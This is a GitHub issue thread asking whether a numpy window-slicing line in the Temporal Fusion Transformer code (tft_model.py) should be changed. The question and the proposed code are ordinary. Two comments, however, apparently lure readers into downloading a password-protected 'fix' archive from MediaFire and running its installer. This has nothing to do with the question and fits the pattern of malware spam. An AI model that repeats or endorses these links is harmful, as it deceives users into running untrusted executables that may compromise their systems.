### ISSUE TITLE
TFT model，“np.stack([x[i:time_steps - (lags - 1) + i, :] for i in range(lags)], axis=1)”，Should it be changed to the following code?

### ISSUE THREAD

**Issue by jixingzheng** [google-research/google-research#2221]
https://github.com/google-research/google-research/blob/1ff9bb3a9685223e9d2ded8888c0a4a9652cf7ba/tft/libs/tft_model.py#L721

def _batch_single_entity(input_data):
    time_steps = len(input_data)
    lags = self.time_steps
    x = input_data.values
    if time_steps >= lags:
        return np.stack(
            [x[i:i + lags, :] for i in range(time_steps - lags + 1)], axis=1)  # Ensure that the length of each slice is lags
    else:
        return None

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jixingzheng** [comment]
My question is that this line of code “np.stack(
            [x[i:time_steps - (lags - 1) + i, :] for i in range(lags)], axis=1)”，should be changed to: “np.stack(
[x[i:i + lags, :] for i in range(time_steps - lags + 1)], axis=1) # Ensure that the length of each slice is lags”

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
